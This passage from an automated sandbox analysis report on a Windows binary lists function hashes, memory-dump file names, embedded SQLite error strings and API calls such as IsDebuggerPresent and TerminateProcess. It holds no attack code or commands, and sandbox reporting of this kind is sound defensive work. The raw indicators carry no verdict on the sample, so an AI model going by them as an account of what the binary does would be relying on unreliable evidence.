                                                                                    • Opcode Fuzzy Hash: db60689ff9ecff68ef8e4b0a676ec21fd0898f62ca4d0aaab1433d7602034d37
                                                                                    • Instruction Fuzzy Hash: 2CE1A071A04762BFEB25CF28D840B6AB7E1BF84310F044699E458DB291D7B4ED94CBD2
                                                                                    Strings
                                                                                    • Page %d is never used, xrefs: 00B33316
                                                                                    • Pointer map page %d is referenced, xrefs: 00B3337F
                                                                                    • d, xrefs: 00B33091
                                                                                    • Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d), xrefs: 00B3322F
                                                                                    • Failed to read ptrmap key=%d, xrefs: 00B331FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Failed to read ptrmap key=%d$Page %d is never used$Pointer map page %d is referenced$d
                                                                                    • API String ID: 0-1091876281
                                                                                    • Opcode ID: f4714316c9d90979f0818c49ee3305020a5887d898733c2f6acc28c06fa48a0c
                                                                                    • Instruction ID: cdca48e4e9d190b9c4c46a60eb644f4184a682cbd0029febaff34861831576c7
                                                                                    • Opcode Fuzzy Hash: f4714316c9d90979f0818c49ee3305020a5887d898733c2f6acc28c06fa48a0c
                                                                                    • Instruction Fuzzy Hash: 7DF16E71E002249BDB25CF28C885BAEB7F5FF45714F2482E9D849AB241DB31AE85CF51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s-mjXXXXXX9XXz$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                    • API String ID: 0-4034981963
                                                                                    • Opcode ID: 43079a1013076fa4a761621b9f4c48d20d944795a93c3db10500d051e84a6c54
                                                                                    • Instruction ID: 8c0118e7877e156183dbd6eaac23ece1cbd618c86a00c610b17737f7268c21c0
                                                                                    • Opcode Fuzzy Hash: 43079a1013076fa4a761621b9f4c48d20d944795a93c3db10500d051e84a6c54
                                                                                    • Instruction Fuzzy Hash: 2D226B746047018FD724CF28D881B6AB7E1FFC8314F2489ADF8998B352DB31E9498B52
                                                                                    Strings
                                                                                    • misuse, xrefs: 00B70C91
                                                                                    • %s at line %d of [%.10s], xrefs: 00B70C96
                                                                                    • d, xrefs: 00B70EA7
                                                                                    • 1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00B70C87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$d$misuse
                                                                                    • API String ID: 0-14470748
                                                                                    • Opcode ID: dbc2e350f05d4b89521011b16229b10d1c75962b65042c1cd0358e577436dc31
                                                                                    • Instruction ID: 2e955eca7ed7a9193574161ed65e4c7e7d7ed8b4a2351bb148cc9e187ad25626
                                                                                    • Opcode Fuzzy Hash: dbc2e350f05d4b89521011b16229b10d1c75962b65042c1cd0358e577436dc31
                                                                                    • Instruction Fuzzy Hash: 06028D70608340DFD724DF28C48476AB7E6FF84714F5489AEE8A99B252D731EC85CB92
                                                                                    Strings
                                                                                    • %r %s BY term out of range - should be between 1 and %d, xrefs: 00B4AF1E
                                                                                    • %r ORDER BY term does not match any column in the result set, xrefs: 00B4AF48
                                                                                    • too many terms in ORDER BY clause, xrefs: 00B4ABC2
                                                                                    • ORDER, xrefs: 00B4AF18
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$ORDER$too many terms in ORDER BY clause
                                                                                    • API String ID: 0-3892209816
                                                                                    • Opcode ID: 06cd98e542aaa3a855d501904bf5c9bdb6fbf92a6341a4b47ca8e4d03f4dac64
                                                                                    • Instruction ID: ed4dcbe0dca52684fc439d1ddcc01ade4d42d7fb681b3184d40018b7115c63a8
                                                                                    • Opcode Fuzzy Hash: 06cd98e542aaa3a855d501904bf5c9bdb6fbf92a6341a4b47ca8e4d03f4dac64
                                                                                    • Instruction Fuzzy Hash: 8BC18B71A483018FC714CF18C480A2AB7E1FF89714F144AADE8959B392D774EE45DB93
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
                                                                                    • API String ID: 0-3078602584
                                                                                    • Opcode ID: c570396ea5434727077d09a8c8446f045382be970d28a4f658bb9ce5d343b2e9
                                                                                    • Instruction ID: c29e87ad2734153321600e198c8cf5c8e81e4e94ef505ea7e50be12486160989
                                                                                    • Opcode Fuzzy Hash: c570396ea5434727077d09a8c8446f045382be970d28a4f658bb9ce5d343b2e9
                                                                                    • Instruction Fuzzy Hash: 8DD24774A083528FC714DF18D490A6ABBF1FFC9704F2489ADE9898B361D770E945CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
                                                                                    • API String ID: 0-3078602584
                                                                                    • Opcode ID: 35d31a1099f7efc7f38795a48d59a1d492d7cc1475eebe3db83943faf8446727
                                                                                    • Instruction ID: ec1c8cf55f0fdacc7160463b912ddfe4dfda77dc26f0e9bd868dcd45d99c8daa
                                                                                    • Opcode Fuzzy Hash: 35d31a1099f7efc7f38795a48d59a1d492d7cc1475eebe3db83943faf8446727
                                                                                    • Instruction Fuzzy Hash: 8B8248706042218FD719DF18E480B6AB7E1FF98714F2946E9E94D9B352C731EC86CB92
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00BFBA1E
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BFBA28
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00BFBA35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: aae64c01d690b36d1f8a820f4fbc8274514f08533da8920b6b577b5ce1460a50
                                                                                    • Instruction ID: 5bee0a83839acc85cbc2e1102a3c4c5b68cb30406e7d1c9878ed717cf3d5a94e
                                                                                    • Opcode Fuzzy Hash: aae64c01d690b36d1f8a820f4fbc8274514f08533da8920b6b577b5ce1460a50
                                                                                    • Instruction Fuzzy Hash: D231B27491121C9BCB21DF28D889B9DBBF4BF08710F5041EAE90CA7250EB709F858F45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
                                                                                    • API String ID: 0-3078602584
                                                                                    • Opcode ID: 48090f1906b4f8dd6de06d59f5e9c804ae274ce7cea6fa7116e62d9674140326
                                                                                    • Instruction ID: b0fb5ca429d4f48a65a89fb09a58b6b4175ed3197b3dfc8643b891e8a24e0287
                                                                                    • Opcode Fuzzy Hash: 48090f1906b4f8dd6de06d59f5e9c804ae274ce7cea6fa7116e62d9674140326
                                                                                    • Instruction Fuzzy Hash: DA5205716087508FC714CF28C49162ABBE2EFC5350F39CAADE4EA9B291D771D846CB52
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00C08456,00000000,?,00000000,00000000,00000000,00000000), ref: 00C08479
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00C08456,00000000,?,00000000,00000000,00000000,00000000), ref: 00C08480
                                                                                    • ExitProcess.KERNEL32 ref: 00C08492
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 0f23638c4456df98fbf1e6241220a7a474a91967d88ce55384a32c6efd7c1b3c
                                                                                    • Instruction ID: f04f0aa96f4dcf8da68897b9c73c622417b23a086b7bebfd96bfca2567aa4740
                                                                                    • Opcode Fuzzy Hash: 0f23638c4456df98fbf1e6241220a7a474a91967d88ce55384a32c6efd7c1b3c
                                                                                    • Instruction Fuzzy Hash: 17E04631410208EFCB21AF94DD2DB4C3F29EB00351F448414F84596531CB35DD96EA81
                                                                                    Strings
                                                                                    • database corruption, xrefs: 00B3153F
                                                                                    • %s at line %d of [%.10s], xrefs: 00B31544
                                                                                    • 1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00B31535
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
                                                                                    • API String ID: 0-3078602584
                                                                                    • Opcode ID: 147b407a16174bedb81c19b286948e568d9b88f5129f27842a0b78801d93086a
                                                                                    • Instruction ID: 3995bcbe6998a38b9abc37414dbe95e3acde522c8c2e250d20626b648c93f9e6
                                                                                    • Opcode Fuzzy Hash: 147b407a16174bedb81c19b286948e568d9b88f5129f27842a0b78801d93086a
                                                                                    • Instruction Fuzzy Hash: 8F2248756043019FD714DF18C881B6AB7E9FF88314F298AE9E8499B352DB31EC85CB91
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B29292
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: :memory:
                                                                                    • API String ID: 885266447-2920599690
                                                                                    • Opcode ID: 09ced0230dcad5e0da11dae8448cd0300d72c48f2b89397f51f4078763480f1d
                                                                                    • Instruction ID: 1671845ff12511db0ba870758de111d7d2ba2fd438fb0a7f36304da33cae297f
                                                                                    • Opcode Fuzzy Hash: 09ced0230dcad5e0da11dae8448cd0300d72c48f2b89397f51f4078763480f1d
                                                                                    • Instruction Fuzzy Hash: 7C328E70A012259FDB24CF29E845BAABBE5FF44304F1481E9E80DAB252DB31DD95CB90
                                                                                    Strings
                                                                                    • database corruption, xrefs: 00B2A56E
                                                                                    • %s at line %d of [%.10s], xrefs: 00B2A573
                                                                                    • 1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00B2A564
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
                                                                                    • API String ID: 0-3078602584
                                                                                    • Opcode ID: 7cb03da7e35a7ffdac9c72812f4c14dbffdf71818b0b435d03610c2158f0f067
                                                                                    • Instruction ID: 0dd5cf8a814193ae31f9f84abafad97e4d1ddc7cbdbe33ad834540e239e0e559
                                                                                    • Opcode Fuzzy Hash: 7cb03da7e35a7ffdac9c72812f4c14dbffdf71818b0b435d03610c2158f0f067
                                                                                    • Instruction Fuzzy Hash: 63D18C71B042119FD718DF18E881A6AB7E6FF88310F4585A9F84D9B352DB31EC85CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s.%s$5
                                                                                    • API String ID: 0-2511244239
                                                                                    • Opcode ID: 4cc1e8531df716141aa6d007a2df69cc207368f7fdc5c074b413988281dc8c5d
                                                                                    • Instruction ID: 253e4a537ee10068e4e56ec9858bab7049ec7d5f685535d42680602ceb4ae11d
                                                                                    • Opcode Fuzzy Hash: 4cc1e8531df716141aa6d007a2df69cc207368f7fdc5c074b413988281dc8c5d
                                                                                    • Instruction Fuzzy Hash: 44F26A746043418FD724DF18C490B6AB7E2FF88304F15899DE8998B3A2DB79E955CF82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
